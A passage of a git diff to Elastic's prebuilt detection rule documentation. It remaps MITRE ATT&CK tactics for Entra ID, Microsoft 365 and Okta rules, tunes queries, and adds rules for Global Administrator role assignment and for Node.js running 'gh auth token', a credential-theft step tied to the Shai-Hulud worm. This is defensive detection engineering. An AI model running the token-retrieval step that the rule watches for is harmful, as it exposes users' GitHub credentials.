Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-device-code-auth-with-broker-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-device-code-auth-with-broker-client.asciidoc index 774a5efdec..a87714ddd0 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-device-code-auth-with-broker-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-device-code-auth-with-broker-client.asciidoc @@ -33,10 +33,10 @@ Identifies device code authentication with an Azure broker client for Entra ID. * Data Source: Azure * Data Source: Microsoft Entra ID * Use Case: Identity and Access Audit -* Tactic: Credential Access +* Tactic: Initial Access * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -117,10 +117,34 @@ This rule optionally requires Azure Sign-In logs from the Azure integration. Ens *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Credential Access -** ID: TA0006 -** Reference URL: https://attack.mitre.org/tactics/TA0006/ +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ * Technique: -** Name: Steal Application Access Token -** ID: T1528 -** Reference URL: https://attack.mitre.org/techniques/T1528/ +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-global-administrator-role-assigned.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-global-administrator-role-assigned.asciidoc new file mode 100644 index 0000000000..dc582c5dbc --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-global-administrator-role-assigned.asciidoc @@ -0,0 +1,122 @@ +[[entra-id-global-administrator-role-assigned]] +=== Entra ID Global Administrator Role Assigned + +In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Microsoft Entra ID and services that use Microsoft Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. They can also elevate privilege to User Access Administrator to pivot into Azure resources. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securitylabs.datadoghq.com/articles/i-spy-escalating-to-entra-id-global-admin/ +* https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Global Administrator Role Assigned* + + +Microsoft Entra ID's Global Administrator role grants comprehensive access to manage Microsoft Entra ID and associated services. Adversaries may exploit this by assigning themselves or others to this role, ensuring persistent control over resources. The detection rule identifies such unauthorized assignments by monitoring specific audit logs for role changes, focusing on the addition of members to the Global Administrator role, thus helping to mitigate potential security breaches. + + +*Possible investigation steps* + + +- Review the Microsoft Entra ID audit logs to identify the user account that performed the "Add member to role" operation, focusing on the specific event dataset and operation name. +- Verify the identity of the user added to the Global Administrator role by examining the modified properties in the audit logs, specifically the new_value field indicating "Global Administrator". +- Check the history of role assignments for the identified user to determine if this is a recurring pattern or a one-time event. +- Investigate the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. +- Review any recent changes or activities performed by the newly assigned Global Administrator to identify any suspicious actions or configurations that may have been altered. +- Consult with the organization's IT or security team to confirm if the role assignment was authorized and aligns with current administrative needs or projects. +- Correlate with Microsoft Entra ID sign-in logs to check for any unusual login patterns or failed login attempts associated with the user who assigned the role. +- Review the reported device to determine if it is a known and trusted device or if it raises any security concerns such as unexpected relationships with the source user. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role temporarily for maintenance or configuration purposes. To manage this, create exceptions for known IT personnel or scheduled maintenance windows. +- Automated scripts or third-party applications that require elevated permissions might be flagged if they are configured to add users to the Global Administrator role. Review and whitelist these scripts or applications if they are verified as safe and necessary for operations. +- Organizational changes, such as mergers or restructuring, can lead to legitimate role assignments that appear suspicious. Implement a review process to verify these changes and exclude them from triggering alerts if they align with documented organizational changes. +- Training or onboarding sessions for new IT staff might involve temporary assignment to the Global Administrator role. Establish a protocol to document and exclude these training-related assignments from detection alerts. + + +*Response and remediation* + + +- Immediately remove any unauthorized users from the Global Administrator role to prevent further unauthorized access and control over Azure AD resources. +- Conduct a thorough review of recent audit logs to identify any additional unauthorized changes or suspicious activities associated with the compromised account or role assignments. +- Reset the credentials of the affected accounts and enforce multi-factor authentication (MFA) to enhance security and prevent further unauthorized access. +- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. +- Implement conditional access policies to restrict Global Administrator role assignments to specific, trusted locations or devices. +- Review and update role assignment policies to ensure that only a limited number of trusted personnel have the ability to assign Global Administrator roles. +- Enhance monitoring and alerting mechanisms to detect similar unauthorized role assignments in the future, ensuring timely response to potential threats. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and + azure.auditlogs.properties.category:RoleManagement and + azure.auditlogs.operation_name:"Add member to role" and + azure.auditlogs.properties.target_resources.*.modified_properties.*.new_value: "\"Global Administrator\"" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc index d37ba4803a..56e4358f08 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc @@ -37,7 +37,7 @@ Identifies when a user signs in with a refresh token using the Microsoft Authent * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -135,6 +135,14 @@ sequence by azure.signinlogs.properties.user_id, azure.signinlogs.properties.dev ** ID: T1098.005 ** Reference URL: https://attack.mitre.org/techniques/T1098/005/ * Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: ** Name: Initial Access ** ID: TA0001 ** Reference URL: https://attack.mitre.org/tactics/TA0001/ diff --git a/docs/detections/prebuilt-rules/rule-details/excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc b/docs/detections/prebuilt-rules/rule-details/excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc index da67390214..0284e86277 100644 --- a/docs/detections/prebuilt-rules/rule-details/excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc @@ -34,7 +34,7 @@ Identifies excessive secret or key retrieval operations from Azure Key Vault. Th * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -138,7 +138,6 @@ from logs-azure.platformlogs-* metadata _id, _index Esql_priv.azure_platformlogs_identity_claim_upn_values = values(azure.platformlogs.identity.claim.upn), Esql.azure_platformlogs_identity_claim_upn_count_distinct = count_distinct(azure.platformlogs.identity.claim.upn), Esql.azure_platformlogs_identity_claim_appid_values = values(azure.platformlogs.identity.claim.appid), - Esql.azure_platformlogs_identity_claim_objectid_values = values(azure.platformlogs.identity.claim.objectid), Esql.source_ip_values = values(source.ip), Esql.geo_city_values = values(geo.city_name), @@ -167,7 +166,6 @@ by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn Esql_priv.azure_platformlogs_identity_claim_upn_values, Esql.azure_platformlogs_identity_claim_upn_count_distinct, Esql.azure_platformlogs_identity_claim_appid_values, - Esql.azure_platformlogs_identity_claim_objectid_values, Esql.source_ip_values, Esql.geo_city_values, Esql.geo_region_values, diff --git a/docs/detections/prebuilt-rules/rule-details/first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc index c415c43f34..93424ad98f 100644 --- a/docs/detections/prebuilt-rules/rule-details/first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc @@ -34,10 +34,10 @@ Identifies when a user is observed for the first time in the last 14 days authen * Data Source: Azure * Data Source: Microsoft Entra ID * Use Case: Identity and Access Audit -* Tactic: Credential Access +* Tactic: Initial Access * Resources: Investigation Guide -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -152,10 +152,22 @@ event.dataset:(azure.activitylogs or azure.signinlogs) *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Credential Access -** ID: TA0006 -** Reference URL: https://attack.mitre.org/tactics/TA0006/ +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ * Technique: -** Name: Steal Application Access Token -** ID: T1528 -** Reference URL: https://attack.mitre.org/techniques/T1528/ +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/github-authentication-token-access-via-node-js.asciidoc b/docs/detections/prebuilt-rules/rule-details/github-authentication-token-access-via-node-js.asciidoc new file mode 100644 index 0000000000..b0a267bb5a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/github-authentication-token-access-via-node-js.asciidoc @@ -0,0 +1,113 @@ +[[github-authentication-token-access-via-node-js]] +=== GitHub Authentication Token Access via Node.js + +This rule detects when the Node.js runtime spawns a shell to execute the GitHub CLI (gh) command to retrieve a GitHub authentication token. The GitHub CLI is a command-line tool that allows users to interact with GitHub from the terminal. The "gh auth token" command is used to retrieve an authentication token for GitHub, which can be used to authenticate API requests and perform actions on behalf of the user. Adversaries may use this technique to access GitHub repositories and potentially exfiltrate sensitive information or perform malicious actions. This activity was observed in the wild as part of the Shai-Hulud worm. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Discovery +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node" and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.args == "gh auth token" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Container and Resource Discovery +** ID: T1613 +** Reference URL: https://attack.mitre.org/techniques/T1613/ diff --git a/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc b/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc index 01ef7bdf7e..b33c0f178f 100644 --- a/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc @@ -34,7 +34,7 @@ Detects when an Okta client address has a certain threshold of Okta user authent * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -118,7 +118,7 @@ The Okta Fleet integration, Filebeat module, or similarly structured data is req from logs-okta* | where event.dataset == "okta.system" and - (event.action rlike "user\.authentication(.*)" or event.action == "user.session.start") and + (event.action like "user.authentication.*" or event.action == "user.session.start") and okta.debug_context.debug_data.request_uri == "/api/v1/authn" and okta.outcome.reason == "INVALID_CREDENTIALS" | keep diff --git a/docs/detections/prebuilt-rules/rule-details/initramfs-extraction-via-cpio.asciidoc b/docs/detections/prebuilt-rules/rule-details/initramfs-extraction-via-cpio.asciidoc index a970da1bce..0eb906776a 100644 --- a/docs/detections/prebuilt-rules/rule-details/initramfs-extraction-via-cpio.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/initramfs-extraction-via-cpio.asciidoc @@ -1,7 +1,7 @@ [[initramfs-extraction-via-cpio]] === Initramfs Extraction via CPIO -This rule detects the extraction of an initramfs image using the `cpio` command on Linux systems. The `cpio` command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. +This rule detects the extraction of an initramfs image using the "cpio" command on Linux systems. The "cpio" command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. *Rule type*: eql @@ -39,7 +39,7 @@ This rule detects the extraction of an initramfs image using the `cpio` command * Data Source: SentinelOne * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -136,9 +136,19 @@ For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/ ---------------------------------- process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed") and -process.name == "cpio" and process.args in ("-H", "--format") and process.args == "newc" and not ( +process.name == "cpio" and process.args in ("-H", "--format") and process.args == "newc" and +not ( process.parent.name in ("mkinitramfs", "dracut") or - process.parent.executable like~ ("/usr/share/initramfs-tools/*", "/nix/store/*") + ?process.parent.executable like~ ("/usr/share/initramfs-tools/*", "/nix/store/*") or + ?process.parent.args in ( + "/bin/dracut", "/usr/share/initramfs-tools/hooks/amd64_microcode", "/usr/bin/dracut", "/usr/sbin/mkinitramfs", + "/usr/sbin/dracut", "/usr/bin/update-microcode-initrd" + ) or + process.args like ("/var/tmp/mkinitramfs_*", "/tmp/tmp.*/mkinitramfs_*") or + ?process.working_directory like ( + "/var/tmp/mkinitramfs-*", "/tmp/microcode-initrd_*", "/var/tmp/mkinitramfs-*", "/var/tmp/dracut.*", + "/var/tmp/mkinitramfs_*" + ) ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kill-command-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/kill-command-execution.asciidoc index 0c32b978fd..4040d5d287 100644 --- a/docs/detections/prebuilt-rules/rule-details/kill-command-execution.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kill-command-execution.asciidoc @@ -30,7 +30,7 @@ This rule detects the execution of kill, pkill, and killall commands on Linux sy * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -128,7 +128,10 @@ For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/ [source, js] ---------------------------------- event.category:process and host.os.type:linux and event.type:start and event.action:exec and -process.name:(kill or pkill or killall) +process.name:(kill or pkill or killall) and not ( + process.args:("-HUP" or "-SIGUSR1" or "-USR2" or "-WINCH" or "-USR1") or + process.parent.command_line:"runc init" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc b/docs/detections/prebuilt-rules/rule-details/m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc index 67c8055763..456836b0d5 100644 --- a/docs/detections/prebuilt-rules/rule-details/m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc @@ -11,7 +11,7 @@ Identifies when an excessive number of files are downloaded from OneDrive using *Risk score*: 47 -*Runs every*: 5m +*Runs every*: 8m *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) @@ -33,7 +33,7 @@ Identifies when an excessive number of files are downloaded from OneDrive using * Tactic: Exfiltration * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc index 277dcfd6af..104fc87be2 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc @@ -40,7 +40,7 @@ Identifies potential brute-force attacks targeting Microsoft 365 user accounts b * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -104,7 +104,7 @@ Identifies brute-force authentication activity against Microsoft 365 services us [source, js] ---------------------------------- -from logs-azure.signinlogs* +from logs-azure.signinlogs-* | eval Esql.time_window_date_trunc = date_trunc(15 minutes, @timestamp), diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc index 52e8754e80..be9496724e 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,10 +30,10 @@ Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Initial Access +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -108,10 +108,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Phishing -** ID: T1566 -** Reference URL: https://attack.mitre.org/techniques/T1566/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc index 9b56d1aeeb..abc794a1ba 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc @@ -7,8 +7,8 @@ Identifies the modification of an anti-phishing rule in Microsoft 365. By defaul *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the modification of an anti-phishing rule in Microsoft 365. By defaul *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,10 +30,10 @@ Identifies the modification of an anti-phishing rule in Microsoft 365. By defaul * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Initial Access +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -108,10 +108,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Phishing -** ID: T1566 -** Reference URL: https://attack.mitre.org/techniques/T1566/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc index f0f5a621a3..04a71b1e79 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc @@ -7,8 +7,8 @@ Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is dis *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is dis *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -28,10 +28,10 @@ Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is dis * Domain: Cloud * Data Source: Microsoft 365 -* Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -105,10 +105,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Persistence -** ID: TA0003 -** Reference URL: https://attack.mitre.org/tactics/TA0003/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Modify Authentication Process -** ID: T1556 -** Reference URL: https://attack.mitre.org/techniques/T1556/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dlp-policy-removed.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dlp-policy-removed.asciidoc index e49a19bef6..95fa80ac57 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dlp-policy-removed.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dlp-policy-removed.asciidoc @@ -7,8 +7,8 @@ Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-policy-deletion.asciidoc index 70a5110571..0ca8ca54b9 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-policy-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-policy-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies when a malware filter policy has been deleted in Microsoft 365. A mal *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a malware filter policy has been deleted in Microsoft 365. A mal *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when a malware filter policy has been deleted in Microsoft 365. A mal * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-rule-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-rule-modification.asciidoc index 93eb2c2508..7eb8f30e44 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-rule-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-rule-modification.asciidoc @@ -7,8 +7,8 @@ Identifies when a malware filter rule has been deleted or disabled in Microsoft *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a malware filter rule has been deleted or disabled in Microsoft *Runs every*: 5m 